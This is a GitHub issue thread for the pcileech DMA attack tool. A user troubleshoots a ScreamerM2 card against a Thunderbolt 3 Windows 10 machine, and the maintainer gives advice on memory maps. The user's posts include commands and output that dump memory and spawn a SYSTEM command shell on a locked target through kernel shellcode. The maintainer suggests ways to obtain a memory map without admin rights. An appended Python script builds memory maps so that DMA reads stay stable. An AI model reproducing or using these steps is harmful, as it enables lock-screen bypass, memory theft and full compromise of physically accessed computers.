ufrisk / pcileech

Direct Memory Access (DMA) Attack Software
GNU Affero General Public License v3.0

ScreamerM2 Failed to load kernel module. #163

Closed d0ntrash closed 3 years ago

d0ntrash commented 3 years ago

Hi,

I just received my ScreamerM2. Now I have some problems using it. I want to attack a Windows 10 19041.746 via Thunderbolt3. Right after a reboot the display command seems to work without any problem:

C:\Users\user\Downloads\PCILeech_files_and_binaries_v4.8-20210202>pcileech.exe display -min 0x1000 -max 0x2000 -device fpga://algo=2 -v

DEVICE: FPGA: ScreamerM2 PCIe gen2 x1 [300,25,500] [v4.7,0a00] [SYNC,NORM]
Memory Display: Contents for address: 0x0000000000001000
0000    e9 4d 06 00 01 00 00 00  01 00 00 00 3f 00 18 10   .M..........?...
0010    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
0020    00 00 00 00 00 00 00 00  00 00 00 00 00 9b 20 00   .............. .
0030    00 00 00 00 00 00 00 00  ff ff 00 00 00 93 cf 00   ................
0040    00 00 00 00 00 00 00 00  ff ff 00 00 00 9b cf 00   ................
0050    00 00 00 00 00 00 00 00  00 70 05 9a 00 00 00 00   .........p......
0060    7c 16 00 00 30 00 da 16  00 00 10 00 00 00 00 00   |...0...........
0070    e0 15 3f 2a 06 f8 ff ff  00 80 00 c0 af f7 ff ff   ..?*............
0080    06 01 07 00 06 01 07 00  01 09 00 00 00 00 00 00   ................
0090    33 00 05 80 00 00 00 00  00 00 00 00 00 00 00 00   3...............
00a0    00 a0 1b 00 00 00 00 00  78 06 37 00 00 00 00 00   ........x.7.....
00b0    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00c0    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00d0    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00e0    00 00 00 00 00 00 57 00  b0 af 9d 65 00 d1 ff ff   ......W....e....
00f0    00 00 00 00 00 00 ff 0f  00 80 9d 65 00 d1 ff ff   ...........e....

As can be seen in the output I am using PCILeech 4.8. The ScreamerM2 came preflashed with v4.7. Could this mismatch cause problems?

As soon as I try anything else (kmdload, probe, ...) something breaks and I also can't use display anymore.

When using kmdload I get the following output:

C:\Users\user\Downloads\PCILeech_files_and_binaries_v4.8-20210202>pcileech.exe kmdload -kmd WIN10_X64_2 -device fpga://algo=2 -vv

----- FPGA DEVICE CONFIG REGISTERS: CORE-READ-ONLY     SIZE: 35 BYTES -----
0000    89 ab 00 00 23 00 00 00  04 07 04 00 00 00 00 00   ....#...........
0010    e0 de 5a 3e 03 00 00 00  e2 de 5a 3e 03 00 00 00   ..Z>......Z>....
0020    00 00 03                                           ...

----- FPGA DEVICE CONFIG REGISTERS: CORE-READ-WRITE    SIZE: 30 BYTES -----
0000    cd 8f 04 00 1e 00 00 00  a0 86 01 00 00 00 00 00   ................
0010    ea 10 07 00 ee 10 66 06  02 3c 00 00 7f 00         ......f..<.. .

----- FPGA DEVICE CONFIG REGISTERS: PCIE-READ-ONLY     SIZE: 48 BYTES -----
0000    01 23 00 00 30 00 00 00  0a 00 16 08 5c 00 00 00   .#..0.......\...
0010    00 00 00 00 06 00 00 00  10 29 00 00 01 00 00 00   .........)......
0020    12 10 00 00 1e 7f 00 00  00 00 7f f8 00 00 00 00   ..... .... .....

----- FPGA DEVICE CONFIG REGISTERS: PCIE-READ-WRITE    SIZE: 88 BYTES -----
0000    45 67 00 f0 58 00 00 00  35 0a 00 01 01 00 00 00   Eg..X...5.......
0010    00 00 00 00 7f f0 48 00  00 00 00 0e 00 00 00 00   .... .H.........
0020    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
0030    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
0040    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
0050    00 00 00 00 24 f4 00 00                            ....$...

----- PCIe CORE Dynamic Reconfiguration Port (DRP)  SIZE: 0x100 BYTES -----
0000    00 00 00 01 00 02 00 00  00 00 00 00 00 00 f0 00   ................
0010    ff ff 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
0020    00 00 00 00 00 00 00 00  00 00 00 40 00 00 00 00   ...........@....
0030    00 00 09 02 30 00 22 7f  02 00 01 00 00 03 11 0c   ....0." ........
0040    02 a1 00 43 01 00 1f fd  7f ff 09 ff 01 20 01 48   ...C.... .... .H
0050    00 05 01 60 11 9c 00 00  00 00 00 00 00 00 00 00   ...`............
0060    00 00 10 60 00 02 40 21  00 40 3d 48 00 23 00 00   ...`..@!.@=H.#..
0070    00 00 00 00 00 00 00 00  00 00 00 00 00 15 00 01   ................
0080    00 01 00 00 00 01 00 00  00 01 00 00 00 01 00 00   ................
0090    00 01 00 00 00 01 00 00  00 00 00 00 00 00 00 00   ................
00a0    00 00 00 00 00 00 00 00  00 02 00 00 12 34 10 18   .............4..
00b0    00 0b 00 01 00 11 00 00  00 00 00 00 00 01 00 00   ................
00c0    00 28 00 41 ff ff ff ff  00 e0 00 00 80 08 00 22   .(.A..........."
00d0    07 ff 03 52 02 48 00 08  00 40 0e 84 fa ac 00 00   ...R.H...@......
00e0    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00f0    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................

----- PCIe CONFIGURATION SPACE (no user set values) SIZE: 0x200 BYTES -----
0000    ee 10 66 06 06 00 10 00  02 00 00 02 20 00 00 00   ..f......... ...
0010    00 00 00 d4 00 00 00 00  00 00 00 00 00 00 00 00   ................
0020    00 00 00 00 00 00 00 00  00 00 00 00 ee 10 07 00   ................
0030    00 00 00 00 40 00 00 00  00 00 00 00 ff 01 00 00   ....@...........
0040    01 48 03 78 08 00 00 00  05 60 80 00 00 00 00 00   .H.x.....`......
0050    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
0060    10 00 02 00 e2 8f 00 00  10 29 01 00 12 f4 03 00   .........)......
0070    00 00 12 10 00 00 00 00  00 00 00 00 00 00 00 00   ................
0080    00 00 00 00 02 00 00 00  00 00 00 00 00 00 00 00   ................
0090    02 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00a0    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00b0    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00c0    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00d0    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00e0    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00f0    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
0100    03 00 c1 10 35 0a 00 01  01 00 00 00 00 00 00 00   ....5...........
0110    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
0120    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
0130    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
0140    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
0150    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
0160    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
0170    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
0180    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
0190    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
01a0    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
01b0    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
01c0    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
01d0    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
01e0    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
01f0    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................

----- PCIe SHADOW CONFIGURATION SPACE (only user set values) SIZE: 0x1000 BYTES -----
0000    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
...
0ff0    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................

LcMemMap_AddRange: 0000000000000000-000000000009ffff -> 0000000000000000
LcMemMap_AddRange: 0000000000100000-0000000250000fff -> 0000000000100000
LeechCore v2.3.0: Open Device: fpga
MemProcFS: Failed to initialize memory process file system in call to vmm.dll!VMMDLL_Initialize
KMD: Failed initializing required MemProcFS/vmm.dll
PCILEECH: Failed to load kernel module.

Can anyone help me with this problem?

ufrisk commented 3 years ago

It's nice to see it's working for you after a fresh boot; then we know DMA is actually working.

Thunderbolt3 is hyper-sensitive to reads outside allowed memory regions. If such a read takes place then it will stop working.

You would need to use the -memmap option to specify a memory map so that PCILeech stays only inside valid memory regions.

If you're lucky -memmap auto will work. If unlucky you would need to specify it manually from within a file - i.e. -memmap c:\temp\your_memory_map.txt.

The easiest way to retrieve it is probably to use DumpIt.exe to create a memory dump of your target system. Then open the dump in my MemProcFS tool - https://github.com/ufrisk/MemProcFS where you'll find the memory map file at: M:\sys\memory\physmemmap.txt

(also, WIN10_X64_3 is more stable than WIN10_X64_2, but first you would need to get it working with the Thunderbolt)

Please let me know how it goes. Try the -memmap auto first.


Also, if you find PCILeech / MemProcFS useful please consider sponsoring the project here on Github. I see people purchasing hardware for hundreds of dollars (of which I receive absolutely zero dollars, since I'm not involved in hardware sales) just to be able to run my free open source software. Sponsorships go for as little as $2 and Github is matching it - a $2 sponsorship for you is a $4 sponsorship for me. Thank You 💖

d0ntrash commented 3 years ago

I already tried -memmap auto which did not work if I remember correctly.

I will try the way you described on Friday, I will let you know if it works.

Is the memory map specific to the OS version or to the hardware?

ufrisk commented 3 years ago

It's related to the hardware, not the OS. If you re-flash the BIOS it may change; otherwise it should be fine I think.

Please let me know how it goes.

d0ntrash commented 3 years ago

Hi Ulf,

I just verified, -memmap auto does not work in this case.

After I created a memory map using RamMap I was able to read most of the pages, as you can see here:

C:\Users\user\Downloads\PCILeech_files_and_binaries_v4.8-20210202>pcileech.exe dump -device fpga -memmap newmap.txt

Memory Dump: Initializing ... Done.
 Current Action: Dumping Memory
 Access Mode:    Normal
 Progress:       10984 / 10984 (100%)
 Speed:          159 MB/s
 Address:        0x0000000100000000
 Pages read:     2064456 / 2811904 (73%)
 Pages failed:   747448 (26%)
Memory Dump: Successful.

I am also able to get a system shell using the WIN10_X64_3 module:

C:\Users\user\Downloads\PCILeech_files_and_binaries_v4.8-20210202>pcileech.exe wx64_pscmd -kmd 0x498a1000 -device FPGA -memmap newmap.txt

EXEC: SUCCESS! shellcode should now execute in kernel!
Please see below for results.

PROCESS CREATOR - AUTOMATICALLY SPAWN CMD.EXE ON TARGET!
================================================================
Automatically spawn a CMD.EXE on the target system. This utility
only work if the target system is locked and the login screen is
visible. If it takes time waiting - then please touch any key on
the target system.   If the utility fails multiple times, please
try wx64_pscreate instead.
===== DETAILED INFORMATION AFTER PROCESS CREATION ATTEMPT ======
NTSTATUS        : 0x00000000
ADDITIONAL INFO : 0x0000
================================================================
Microsoft Windows [Version 10.0.19042.746]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

Using the WIN10_X64_2 module I get a blue screen saying ATTEMPTED_EXECUTE_OF_NOEXECUTE_MEMORY. Using WIN10_X64 freezes the victim OS.

Seeing this work is really nice, but it kind of breaks my attacker model since I need admin privileges to get the memory map (correct me if I am wrong).

So far I do not quite understand how the -memmap auto function works and why it works only in some cases. I should probably take a look at the code for this :)

ufrisk commented 3 years ago

The memory map will be the same across same model of devices with the same amount of memory.

The -memmap auto sometimes fails because I currently initialize the whole MemProcFS system in the background (via API calls) and read the memory map from the Windows registry to parse it out. That is a lot of reads that can go wrong. I'll switch the registry reading (which is complex) to reading it from the kernel. This won't completely solve the issue; but it will make it somewhat more likely that it will succeed.


This is unfortunately the way things are; but the memmap should at least be very similar/the same across similar devices; so it won't really break the attacker model for rich attackers... Also, if it's auto-booting you can try to dump as much memory as you can using PCILeech with your own memory map; then try to parse the proper one out with MemProcFS... Or just boot from USB into another OS and parse the memory map from there :)

Anyway; it's super nice to see it's working for you. I'll close the issue now since it seems like it's resolved. Please let me know if there are any outstanding issues around this; otherwise I wish you the best luck with your DMA attacks.


Also, if you should find PCILeech / MemProcFS useful please consider sponsoring the project here on Github. I see people purchasing hardware for hundreds of dollars (of which I receive absolutely zero dollars) just to be able to run my free open source software. Sponsorships go for as little as $2 and Github is matching it - a $2 sponsorship for you is a $4 sponsorship for me. Thank You 💖
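The two ufrisk replies above turn on the same point: over Thunderbolt 3 a single DMA read outside real RAM kills the session, so PCILeech needs a memory map that lists only valid ranges, and `-memmap auto` is fragile because it recovers that map by reading the Windows registry through DMA. The script below is an added example, not PCILeech or MemProcFS code, showing what that registry data actually looks like and how to turn it into a map file you can hand to `-memmap` once you have any local or offline access to the target (a RamMap export, a DumpIt image, or a USB boot). It parses the binary `CM_RESOURCE_LIST` stored under `HKLM\HARDWARE\RESOURCEMAP\System Resources\Physical Memory` (structure layouts are the Windows DDK ones: 20-byte packed `CM_PARTIAL_RESOURCE_DESCRIPTOR`, type 3 for memory, type 7 plus a Length40/48/64 flag for ranges over 4 GiB; the key path is not stated on this page). The output line format `start - end -> remap` is an assumption modelled on the `LcMemMap_AddRange` log lines earlier in the thread; check it against the `-memmap` documentation of your PCILeech version. The sample buffer is constructed for the example and is not a capture from a real machine.

```python
"""Build a PCILeech-style memory map from a Windows CM_RESOURCE_LIST (added example)."""
import struct
from typing import List, Tuple

CM_RESOURCE_MEMORY = 3        # CmResourceTypeMemory
CM_RESOURCE_MEMORY_LARGE = 7  # CmResourceTypeMemoryLarge (ranges > 4 GiB)
CM_RESOURCE_MEMORY_LARGE_40 = 0x0200  # Length40: length = field << 8
CM_RESOURCE_MEMORY_LARGE_48 = 0x0400  # Length48: length = field << 16
CM_RESOURCE_MEMORY_LARGE_64 = 0x0800  # Length64: length = field << 32

PARTIAL_DESC_SIZE = 20  # sizeof(CM_PARTIAL_RESOURCE_DESCRIPTOR), packed to 4 bytes


def parse_cm_resource_list(buf: bytes) -> List[Tuple[int, int]]:
    """Return (start, length) for every memory descriptor in a CM_RESOURCE_LIST."""
    ranges: List[Tuple[int, int]] = []
    off = 0
    (full_count,) = struct.unpack_from("<I", buf, off)
    off += 4
    for _ in range(full_count):
        # CM_FULL_RESOURCE_DESCRIPTOR: InterfaceType, BusNumber, then the embedded
        # CM_PARTIAL_RESOURCE_LIST header: Version, Revision, Count
        _iface, _bus, _ver, _rev, part_count = struct.unpack_from("<IIHHI", buf, off)
        off += 16
        for _ in range(part_count):
            # Type, ShareDisposition, Flags, then the Memory union: Start (8), Length (4)
            typ, _share, flags, start, length = struct.unpack_from("<BBHQI", buf, off)
            off += PARTIAL_DESC_SIZE
            if typ == CM_RESOURCE_MEMORY_LARGE:
                if flags & CM_RESOURCE_MEMORY_LARGE_40:
                    length <<= 8
                elif flags & CM_RESOURCE_MEMORY_LARGE_48:
                    length <<= 16
                elif flags & CM_RESOURCE_MEMORY_LARGE_64:
                    length <<= 32
            elif typ != CM_RESOURCE_MEMORY:
                continue  # I/O ports, interrupts etc. are not RAM
            ranges.append((start, length))
    return ranges


def to_memmap(ranges, page: int = 0x1000) -> str:
    """Emit one 'start - end -> remap' line per range, rounded inward to page bounds.

    Rounding inward matters: a partial page at the edge of RAM would otherwise be
    fetched as a whole page and touch an address outside valid memory, which is
    exactly the read that makes a Thunderbolt 3 DMA session stop responding.
    """
    lines = []
    for start, length in sorted(ranges):
        s = (start + page - 1) & ~(page - 1)
        e = ((start + length) & ~(page - 1)) - 1
        if e > s:
            lines.append(f"{s:016x} - {e:016x} -> {s:016x}")
    return "\n".join(lines)


def build_sample_resource_list() -> bytes:
    """Constructed CM_RESOURCE_LIST for offline testing (not captured from a real machine)."""
    def desc(typ, flags, start, length_field):
        return struct.pack("<BBHQI", typ, 1, flags, start, length_field) + b"\0" * 4
    partials = (
        desc(CM_RESOURCE_MEMORY, 0, 0x1000, 0x9f000)           # 0x1000-0x9ffff
        + desc(CM_RESOURCE_MEMORY, 0, 0x100000, 0x7ff00000)    # 0x100000-0x7fffffff
        + desc(CM_RESOURCE_MEMORY_LARGE, CM_RESOURCE_MEMORY_LARGE_40,
               0x100000000, 0x150001000 >> 8)                  # > 4 GiB, needs Length40
    )
    header = struct.pack("<I", 1)                # one CM_FULL_RESOURCE_DESCRIPTOR
    full = struct.pack("<IIHHI", 0, 0, 1, 1, 3)  # Internal bus 0, v1.1, 3 partials
    return header + full + partials


def read_from_registry() -> bytes:
    """Windows only: raw CM_RESOURCE_LIST from the registry (the source ufrisk mentions)."""
    import winreg
    key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
                         r"HARDWARE\RESOURCEMAP\System Resources\Physical Memory")
    value, _ = winreg.QueryValueEx(key, ".Translated")
    return value


if __name__ == "__main__":
    # Offline: parse the constructed sample. On the target itself, swap in read_from_registry().
    print(to_memmap(parse_cm_resource_list(build_sample_resource_list())))
```

Redirect the output to a file and pass it as `-memmap yourfile.txt`. Because the map describes the hardware, not the OS, a map generated once on an identical model with the same RAM configuration can be reused, which is the "same model, same amount of memory" point made above; the inward page rounding in `to_memmap` is the detail to keep if you adapt this to RamMap or `physmemmap.txt` input.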